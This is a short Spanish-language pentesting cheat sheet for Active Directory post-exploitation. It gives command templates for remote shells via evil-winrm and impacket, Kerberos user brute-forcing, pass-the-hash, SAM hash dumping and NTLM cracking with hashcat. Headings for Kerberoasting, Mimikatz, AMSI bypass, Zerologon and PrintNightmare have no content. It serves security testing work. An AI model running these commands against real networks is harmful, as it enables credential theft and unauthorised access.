Ataques Post-Explotación

Acceso con Shell

evil-winrm -i <target> -u <username> -p <password>
impacket-psexec dominio.local/<USER>@<IP>
impacket-wmiexec dominio.local/<USER>@<IP>

Enumeración de usuarios mediante fuerza bruta a Kerberos

kerbrute -domain <DOMAIN>.LOCAL -users <USER_LIST> -dc-ip <IP>

Pass the Hash

#Comprobar credenciales válidas
crackmapexec smb <IP/CIDR> -u <USER> -H <HASH> --local-auth

#Inicio de sesión PTH
evil-winrm -i <DOMAIN>.local -u <USER> -H "<HASH>"
impacket-psexec <USER>:@<IP> -hashes <LMHASH>:<NTHASH>

Extracción de hashes de la SAM

impacket-secretsdump <DOMINIO>.LOCAL/<USER>@<IP>

Cracking de hashes NTLM

hashcat -m 1000 hashes.txt rockyou.txt

Extracción de datos del dominio

Kerberoasting

Mimikatz

Evasión de antivirus

AMSI Bypass (Funcionando 12/2022)

Otros ataques

Group Policy Preferences (GPP Attack)

Zerologon

PrintNightmare

Última actualización